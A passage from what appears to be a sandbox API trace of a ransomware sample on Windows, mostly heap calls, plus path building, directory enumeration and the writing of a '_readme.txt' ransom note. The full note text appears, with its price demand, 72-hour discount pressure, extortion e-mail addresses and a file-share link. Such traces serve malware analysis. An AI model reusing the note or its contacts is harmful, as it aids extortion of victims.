0x2d2ec90 [0174.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.544] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0174.544] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.544] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.544] PathFindFileNameW (pszPath="") returned="" [0174.544] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.545] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.545] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.545] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.546] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0174.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.546] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0174.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.546] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.546] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.547] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.548] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.549] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.550] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: 